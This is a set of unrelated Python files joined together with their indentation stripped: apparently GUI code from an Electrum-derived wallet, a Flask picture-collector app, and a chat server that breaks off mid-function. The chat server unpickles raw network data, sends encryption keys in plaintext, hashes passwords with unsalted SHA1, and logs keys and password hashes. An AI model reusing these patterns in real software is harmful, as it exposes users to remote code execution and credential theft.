def encrypt_message(self, address = ''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_keys(address)[0]
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
parent = parent or self
d = WindowModalDialog(parent, _("Enter Password"))
pw = QLineEdit()
pw.setEchoMode(2)
vbox = QVBoxLayout()
if not msg:
msg = _('Please enter your password')
vbox.addWidget(QLabel(msg))
grid = QGridLayout()
grid.setSpacing(8)
grid.addWidget(QLabel(_('Password')), 1, 0)
grid.addWidget(pw, 1, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
d.setLayout(vbox)
run_hook('password_dialog', pw, grid, 1)
if not d.exec_(): return
return unicode(pw.text())
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str, Transaction
try:
tx = tx_from_str(txt)
return Transaction(tx)
except:
traceback.print_exc(file=sys.stdout)
self.show_critical(_("Electrum was unable to parse your transaction"))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_qr(self.config)
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
# transactions are binary, but qrcode seems to return utf8...
data = data.decode('utf8')
z = bitcoin.base_decode(data, length=None, base=43)
data = ''.join(chr(ord(b)) for b in z).encode('hex')
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
try:
self.wallet.check_password(password)
except Exception as e:
self.show_error(str(e))
return
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.addresses(True)
done = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done:
break
private_keys[addr] = "\n".join(self.wallet.get_private_key(addr, password))
d.emit(SIGNAL('computing_privkeys'))
d.emit(SIGNAL('show_privkeys'))
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
d.connect(d, QtCore.SIGNAL('computing_privkeys'), lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
d.connect(d, QtCore.SIGNAL('show_privkeys'), show_privkeys)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.dat")
if not labelsFile: return
try:
f = open(labelsFile, 'r')
data = f.read()
f.close()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum_labels.dat', "*.dat")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f)
self.show_message(_("Your labels where exported to") + " '%s'" % str(fileName))
except (IOError, os.error), reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error), reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, confirmations, value, timestamp, balance = item
if confirmations:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = "unknown"
else:
time_string = "unconfirmed"
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
label = label.encode('utf-8')
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = QTextEdit()
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses(self.current_account)
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text())
if bitcoin.is_address(addr):
return addr
def get_pk():
pk = str(keys_e.toPlainText()).strip()
if Wallet.is_private_key(pk):
return pk.split()
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
if not d.exec_():
return
fee = self.wallet.fee_per_kb(self.config)
tx = Transaction.sweep(get_pk(), self.network, get_address(), fee)
if not tx:
self.show_message(_('No inputs found. (Note that inputs need to be confirmed)'))
return
self.warn_if_watching_only()
self.show_transaction(tx)
@protected
def do_import_privkey(self, password):
if not self.wallet.has_imported_keys():
if not self.question('<b>'+_('Warning') +':\n</b><br/>'+ _('Imported keys are not recoverable from seed.') + ' ' \
+ _('If you ever need to restore your wallet from its seed, these keys will be lost.') + '<p>' \
+ _('Are you sure you understand what you are doing?'), title=_('Warning')):
return
text = text_dialog(self, _('Import private keys'), _("Enter private keys")+':', _("Import"))
if not text: return
text = str(text).split()
badkeys = []
addrlist = []
for key in text:
try:
addr = self.wallet.import_key(key, password)
except Exception as e:
badkeys.append(key)
continue
if not addr:
badkeys.append(key)
else:
addrlist.append(addr)
if addrlist:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(addrlist))
if badkeys:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(badkeys))
self.address_list.update()
self.history_list.update()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(languages.values())
try:
index = languages.keys().index(self.config.get("language",''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = languages.keys()[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Fee per kilobyte of transaction.')
])
fee_label = HelpLabel(_('Transaction fee per kb') + ':', msg)
fee_e = BTCkBEdit(self.get_decimal_point)
def on_fee(is_done):
if self.config.get('dynamic_fees'):
return
v = fee_e.get_amount() or 0
self.config.set_key('fee_per_kb', v, is_done)
self.update_fee()
fee_e.editingFinished.connect(lambda: on_fee(True))
fee_e.textEdited.connect(lambda: on_fee(False))
tx_widgets.append((fee_label, fee_e))
dynfee_cb = QCheckBox(_('Dynamic fees'))
dynfee_cb.setChecked(self.config.get('dynamic_fees', False))
dynfee_cb.setToolTip(_("Use a fee per kB value recommended by the server."))
dynfee_sl = QSlider(Qt.Horizontal, self)
# The pref is from 0 to 100; add 50 to get the factor from 50% to 150%
dynfee_sl.setRange(0, 100)
dynfee_sl.setTickInterval(10)
dynfee_sl.setTickPosition(QSlider.TicksBelow)
dynfee_sl.setValue(self.config.get('fee_factor', 50))
dynfee_sl.setToolTip("Min = 50%, Max = 150%")
multiplier_label = HelpLabel("", _("Multiply the recommended fee/kb value by a constant factor. Min = 50%, Max = 150%"))
tx_widgets.append((dynfee_cb, dynfee_sl))
tx_widgets.append((None, multiplier_label))
def update_feeperkb():
fee_e.setAmount(self.wallet.fee_per_kb(self.config))
b = self.config.get('dynamic_fees', False)
dynfee_sl.setEnabled(b)
multiplier_label.setEnabled(b)
fee_e.setEnabled(not b)
def slider_moved():
multiplier_label.setText(_('Fee multiplier: %3d%%')
% (dynfee_sl.sliderPosition() + 50))
def slider_released():
self.config.set_key('fee_factor', dynfee_sl.sliderPosition(), False)
update_feeperkb()
def on_dynfee(x):
dynfee = x == Qt.Checked
self.config.set_key('dynamic_fees', dynfee)
update_feeperkb()
dynfee_cb.stateChanged.connect(on_dynfee)
dynfee_sl.valueChanged.connect(slider_moved)
dynfee_sl.sliderReleased.connect(slider_released)
update_feeperkb()
slider_moved()
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet(GREEN_BG if validated else RED_BG)
else:
alias_e.setStyleSheet(RED_BG)
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.connect(self, SIGNAL('alias_received'), set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet(RED_BG if SSL_error else GREEN_BG if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['WLC', 'mWLC', 'µWLC']
msg = _('Base unit of your wallet.')\
+ '\n1WLC=1000mWLC.\n' \
+ _(' These settings affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e, fee_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'WLC':
self.decimal_point = 8
elif unit_result == 'mWLC':
self.decimal_point = 5
elif unit_result == 'µWLC':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
self.history_list.update()
self.receive_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(on_unit)
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(block_explorer_info.keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_explorers.index(block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.\nOn linux, type: 'apt-get install python-zbar'")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.zbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", str(qr_combo.itemData(x).toString()), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((usechange_cb, None))
tx_widgets.append((multiple_cb, None))
showtx_cb = QCheckBox(_('View transaction before signing'))
showtx_cb.setChecked(self.show_before_broadcast())
showtx_cb.stateChanged.connect(lambda x: self.set_show_before_broadcast(showtx_cb.isChecked()))
showtx_cb.setToolTip(_('Display the details of your transactions before signing it.'))
tx_widgets.append((showtx_cb, None))
can_edit_fees_cb = QCheckBox(_('Set transaction fees manually'))
can_edit_fees_cb.setChecked(self.config.get('can_edit_fees', False))
def on_editfees(x):
self.config.set_key('can_edit_fees', x == Qt.Checked)
self.update_fee_edit()
can_edit_fees_cb.stateChanged.connect(on_editfees)
can_edit_fees_cb.setToolTip(_('This option lets you edit fees in the send tab.'))
tx_widgets.append((can_edit_fees_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
tabs_info = [
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
self.disconnect(self, SIGNAL('alias_received'), set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def run_network_dialog(self):
if not self.network:
self.show_warning(_('You are using Electrum in offline mode; restart Electrum if you want to get connected'), title=_('Offline'))
return
NetworkDialog(self.wallet.network, self.config, self).do_exec()
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_wallet_type'):
continue
try:
cb = QCheckBox(descr['fullname'])
cb.setEnabled(plugins.is_available(name, self.wallet))
cb.setChecked(p is not None and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(i+1,1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def show_account_details(self, k):
account = self.wallet.accounts[k]
d = WindowModalDialog(self, _('Account Details'))
vbox = QVBoxLayout(d)
name = self.wallet.get_account_name(k)
label = QLabel('Name: ' + name)
vbox.addWidget(label)
vbox.addWidget(QLabel(_('Address type') + ': ' + account.get_type()))
vbox.addWidget(QLabel(_('Derivation') + ': ' + k))
vbox.addWidget(QLabel(_('Master Public Key:')))
text = QTextEdit()
text.setReadOnly(True)
text.setMaximumHeight(170)
vbox.addWidget(text)
mpk_text = '\n'.join( account.get_master_pubkeys() )
text.setText(mpk_text)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
|
app.py
|
import sys
import json
import sqlalchemy as sa
from threading import Thread
from flask import Flask, request, jsonify
from flask_httpauth import HTTPBasicAuth
from flask_cors import CORS
from db import engine, Base, Session
from event import Event
from observer import Observer
from config import load_vars
from datetime import datetime, timedelta
from werkzeug.security import generate_password_hash, check_password_hash
def persist_event(event):
session = Session()
session.add(event)
session.commit()
session.close()
def get_last_events(days):
session = Session()
query_result = session.query(sa.func.concat(sa.func.day(Event.timestamp), '/', sa.func.month(Event.timestamp), '/', sa.func.year(Event.timestamp)), sa.func.count(Event.id)).filter(
Event.timestamp > datetime.today() - timedelta(days=days)).group_by(sa.func.year(Event.timestamp), sa.func.month(Event.timestamp), sa.func.day(Event.timestamp)).order_by(Event.timestamp).all()
return json.dumps(query_result)
def get_events_by_day(day, month, year):
session = Session()
return json.dumps(session.query(sa.func.hour(Event.timestamp), sa.func.count(Event.id)).filter(sa.extract('day', Event.timestamp) == day, sa.extract('month', Event.timestamp) == month, sa.extract('year', Event.timestamp) == year).group_by(sa.func.hour(Event.timestamp)).order_by(Event.timestamp).all())
env_vars = load_vars()
Base.metadata.create_all(engine)
observer = Observer(10, 'asmi-wshop-bucket',
env_vars['AWS_ACCESS_KEY'], env_vars['AWS_SECRET_KEY'])
app = Flask("collector")
auth = HTTPBasicAuth()
CORS(app)
users = {
"root": generate_password_hash(env_vars['BASIC_AUTH_PASSWORD'])
}
@auth.verify_password
def verify_password(username, password):
if username in users and check_password_hash(users.get(username), password):
return username
@app.route("/", methods=['GET'])
def index():
return "collector is running"
@app.route('/pictures', methods=['GET'])
def pictures():
return json.dumps(observer.get_last_pictures(5))
@app.route("/data", methods=['GET'])
def get_data():
try:
days = int(request.args.get('days'))
if days is None or days > 365:
raise ValueError
except (ValueError, TypeError):
days = 10
return get_last_events(days)
@app.route('/detail', methods=['GET'])
def get_detailed_day():
try:
day = int(request.args.get('day'))
month = int(request.args.get('month'))
year = int(request.args.get('year'))
if day is None or day > 31 or month is None or month > 12 or year is None or year < 2018 or year > 2022:
raise ValueError
except (ValueError, TypeError):
return "Bad request", 400
return get_events_by_day(day, month, year)
@app.route("/collect", methods=['POST'])
@auth.login_required()
def collect():
try:
payload = request.get_json()
if "image" not in payload.keys():
return jsonify(message="Invalid request"), 400
found_event = observer.analyze_picture(payload["image"])
if found_event:
Thread(target=persist_event, args=[found_event]).start()
print("Stored cat event")
return "OK"
except:
return jsonify(message="An error occurred"), 500
|
Server.py
|
# Imports
import socket # Communication
import threading # Communication with multiple users at once
import pickle # Serialising data
import hashlib # Hashing passwords
from Crypto.Cipher import AES # AES encryption algorithms
from Crypto.Random import get_random_bytes # For generating random keys and nonces
# A list of codes used in this program to prefix messages, so client knows their meaning
'''
______________________________________
| CODE | MEANING |
|____________________________________|
? | Signup |
! | Signin |
$ | Control |
@ | Direct Message |
^ | Everyone Message |
* | Request list |
+ | New user online |
- | User logged off |
= | Request pics dict |
p | New profile pic |
_____________________________________|
'''
# A dictionary storing usernames and passwords
logins = {}
# dictionary to store corresponding socket to username
record = {}
# dictionary to username to socket
records = {}
# dictionary to store username to server key
keys = {}
# Dictionary storing profile pictures
pics = {}
# List to keep track of socket descriptors
connected_list = []
# A dictionary for working with logins (note: this is just so we can use the data in the file)
loginss = {}
# Starting the server socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Note: code skips to end as these function are not used until later
# A custom made function for sending double-layer encyrpted data to clients
def send_to_client(clientsocket, message, key):
# encrypt with our own key, they decrypt with ours
# Serialising message so it can be encrypted
msg = pickle.dumps(message)
# Creating a new cipher
cipher = AES.new(key, AES.MODE_EAX)
# Ciphering the data
# NOTE: WE ARE USING A RANDOMLY GENERATED NONCE, for second layer encryption
ciphered_data, tag = cipher.encrypt_and_digest(msg)
# Packing the data together and serialising it again so it can be sent
tosend = [cipher.nonce, tag, ciphered_data]
tosend = pickle.dumps(tosend)
# Send packaged data
clientsocket.send(tosend)
return
# A custom function to recieve client data, then decrypt, then verify
def client_receive(clientsocket, otherkey):
# Receive data
msg = clientsocket.recv(2048)
# Making sure client hasn't disconnected
if not msg:
return "disconnect"
else:
# Seperating packaged data
msg = pickle.loads(msg)
noonce = msg[0]
tag = msg[1]
data = msg[2]
# Creating cipher for decryption
cipher = AES.new(otherkey, AES.MODE_EAX, noonce)
# Verifying integrity of data using a tag
msg = cipher.decrypt_and_verify(data, tag)
# Deserialising data
msg = pickle.loads(msg)
return msg
# A custom function for sending data to all clients, except sender
def send_all(sender, message):
for i in connected_list:
if i == sender:
continue
# Finding the socket
receiversoc = records[i]
# Send data using above function
send_to_client(receiversoc, message, keys[i])
# A custom function for sending a message to all users
def msg_all(message, sender):
# Constructing so client knows what this message is
construct = "^"+ sender + " " + message
# Send data using above function
send_all(sender, construct)
# A custom function for telling all clients about a new logon
def new_online(user):
# Construciting
construct = '+' + user
# Sending to all using function
send_all(user, construct)
# A custom function to check if a file exists without throwing errors
def file_exists(name):
filename = name + ".txt"
try:
my_file = open(filename)
my_file.close()
return True
except:
return False
# A utility function to allow quick updating of saved passwords and profile pictures
def updatefile(name, obj):
# Open file
with open(name, 'wb+') as file:
# Dump new data
pickle.dump(obj, file)
# The main function for communicating with clients on a new thread
# This handles most work and messaging duties
# NOTE: this is run on one thread per client
def on_new_client(clientsocket,addr):
# A string for storing username
username = ''
# Encryption Handshake
print("NETOWRK: Attempting handshake with: " + addr[0] + ":" + str(addr[1]))
# Generating a new COMPLETELY RANDOM key
key = get_random_bytes(16)
# Exchanging (not secure)
clientsocket.send(key)
# Receiving other key
otherkey = clientsocket.recv(1024)
# Printing it on console
print("NETWORK: Server key: " + str(key) + ", "+ str(addr[0]) + ":" + str(addr[1]) + " key:", str(otherkey))
# Wrapped in try except to detect logging off of users
try:
# Attempting sign in and sing up
while True:
# Receive data
login = client_receive(clientsocket, otherkey)
print("DEBUG: login / signup attempt", login)
# Making sure the client hasn't disconnected
if login == "disconnect":
clientsocket.close()
break
# Splitting username and password, clients have already validated input
user, passw = login[1:].split()
passw = passw.encode("utf-8")
# Hashing the password
passw = hashlib.sha1(passw)
# Storing hashed password in hex form
passw = passw.hexdigest()
print("DEBUG: Hashed password is: " + str(passw))
# if sign up else if login attempt
if(login[0] == '?'):
# Creating an account
# If user hasn't already signed up
if user not in loginss:
# Store username and password combo in memory
loginss[user] = passw;
# Tell the client
send_to_client(clientsocket, "$success-signup", key)
# Give them default profile pic
pics[user] = 0
# Update relevant storage
